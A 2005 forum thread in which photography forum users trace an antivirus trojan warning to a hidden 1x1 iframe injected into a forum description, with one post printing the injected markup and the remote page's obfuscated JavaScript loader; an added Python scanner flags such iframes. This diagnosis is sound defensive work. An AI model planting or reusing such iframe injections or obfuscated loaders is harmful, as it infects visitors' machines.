
Author Topic: Trojan Horse Warning  (Read 5674 times)

Jack Flesher

  • Sr. Member
  • Posts: 2592
    • www.getdpi.com
Trojan Horse Warning
« on: November 20, 2005, 01:03:39 PM »

FWIW -- My virus detector signals a trojan horse virus every time I log into the user forums...

schaubild

  • Full Member
  • Posts: 141
Trojan Horse Warning
« Reply #1 on: November 20, 2005, 01:11:02 PM »

Same with me. The site tries to run a file named load.exe...  

francois

  • Sr. Member
  • Posts: 7793
Trojan Horse Warning
« Reply #2 on: November 20, 2005, 01:18:59 PM »

With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.
« Last Edit: November 20, 2005, 01:23:12 PM by francois »
Francois

Peter McLennan

  • Sr. Member
  • Posts: 1849
Trojan Horse Warning
« Reply #3 on: November 20, 2005, 01:45:20 PM »

Quote
With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.


This morning I'm getting a blocked popup warning when I go to "view new posts".  Never seen that here before.

Peter

Concorde-SST

  • Full Member
  • Posts: 102
Trojan Horse Warning
« Reply #4 on: November 20, 2005, 01:48:11 PM »

Hello -

I'm from Europe and I never had such problems
with this website.

I'm using a Mac with Safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.

Gary Brown

  • Full Member
  • Posts: 211
Trojan Horse Warning
« Reply #5 on: November 20, 2005, 01:49:57 PM »

In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.

Ben Rubinstein

  • Sr. Member
  • Posts: 1735
Trojan Horse Warning
« Reply #6 on: November 20, 2005, 01:59:47 PM »

Yup, I've been getting that, I've had my virus program block it but it still opens an empty window and tries to load the link Gary mentioned.

francois

  • Sr. Member
  • Posts: 7793
Trojan Horse Warning
« Reply #7 on: November 20, 2005, 02:01:43 PM »

Quote
Hello -

I'm from Europe and I never had such problems
with this website.

I'm using a Mac with Safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.

I'm also in Europe and using a Mac with Safari. As soon as the forum page loads, Safari closes the window. I tried to clear the caches & cookies and it helped somewhat but now it does it again.
     
Francois

francois

  • Sr. Member
  • Posts: 7793
Trojan Horse Warning
« Reply #8 on: November 20, 2005, 02:03:53 PM »

Quote
In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.


If I load the offending url, Safari (on the Mac) closes the window immediately. Using curl shows the hacked  source leading to the Russian address.

"Hacked" LL forum source:
<td class="row2"><b><a href="http://luminous-landscape.com/forum/index.php?amp;showforum=1">Landscape &amp; Nature Photography</a></b><br /><span class="forumdesc">Nature Photography ? technical and esthetic issues<iframe src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"<br /><br /><i></i></span></td>



"Russian" page source:
<script language=JavaScript>
function decrypt_p(x)
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,58,7,61,18,40,43,41,34,6,0,0,0,0,0,0,25,22,31,49,36,26,16,5,47,50,57,
45,14,33,15,8,12,2,20,27,53,30,42,9,0,1,29,0,0,0,0,48,0,54,60,59,28,10,35,55,62,3
9,3,21,52,4,38,24,13,17,23,37,51,19,44,11,32,46,56);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write}}decrypt_p("Gn7CXHdlXB3n@Ubnb6PlGIU3GIvTGUdIeSvtX2PMm4oneUbn@V5CXHdlXB3n@EKCrtdTqroImHv
_Fuv_XfJtmNpCASbTPrZlGE3T9f7xWtbCeEdIeSp_whvTQy@neEKCrtdTqHW")
</script>
« Last Edit: November 20, 2005, 02:12:39 PM by francois »
Francois
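
Added example, not part of the original posts: a Python check a site owner could run over fetched page source (for instance the output of curl) to flag the pattern reported above, a 1x1 iframe whose src points off-site, including the case where the injected tag is missing its closing ">". The host names and sample markup are constructed placeholders, and the 2-pixel threshold is an assumption.

```python
import re
from urllib.parse import urlparse

# Opening <iframe ...> tag. Stops at the next '<' or '>' so that a tag with
# no closing '>' (as in the markup quoted in the thread) is still captured.
IFRAME_RE = re.compile(r"<iframe\b([^<>]*)", re.IGNORECASE)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")

def parse_attrs(raw):
    """Return the tag's attributes as a dict with lower-cased names."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        attrs[m.group(1).lower()] = next(g for g in m.groups()[1:] if g is not None)
    return attrs

def is_tiny(value, max_px=2):
    """True for a plain pixel size of max_px or less ('1', '0px'); not '100%'."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "")
    return bool(m) and int(m.group(1)) <= max_px

def find_suspicious_iframes(html, site_hosts):
    """Flag iframes that are both effectively invisible and loaded off-site."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        offsite = bool(host) and host not in site_hosts  # relative src = same site
        tiny = is_tiny(attrs.get("width")) and is_tiny(attrs.get("height"))
        if offsite and tiny:
            unterminated = html[m.end():m.end() + 1] != ">"
            findings.append({"src": src, "host": host, "unterminated": unterminated})
    return findings

# Constructed sample modelled on the forum row quoted above (placeholder hosts),
# plus two benign iframes that must not be flagged.
SAMPLE = (
    '<td class="row2"><b><a href="http://forum.example/index.php?showforum=1">'
    'Landscape</a></b><br /><span class="forumdesc">Technical issues'
    '<iframe src="http://injected.example/board/index.php" width="1" height="1"'
    '<br /><br /></span></td>\n'
    '<iframe src="http://video.example/embed/1" width="560" height="315"></iframe>\n'
    '<iframe src="/keepalive.html" width="1" height="1"></iframe>\n'
)

if __name__ == "__main__":
    for hit in find_suspicious_iframes(SAMPLE, {"forum.example"}):
        print(hit)
```
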

mguertin

  • Guest
Trojan Horse Warning
« Reply #9 on: November 20, 2005, 02:33:27 PM »

Thanks guys.

This has been fixed.  Someone found a way to trigger an unwanted password reset.

So no more trojan and I'm looking into how the password reset was triggered so they can't use this method to gain access any longer.

Mark

P.S. Thanks for the extra info in this thread, made it much easier to track down as I'm also on Safari on a Mac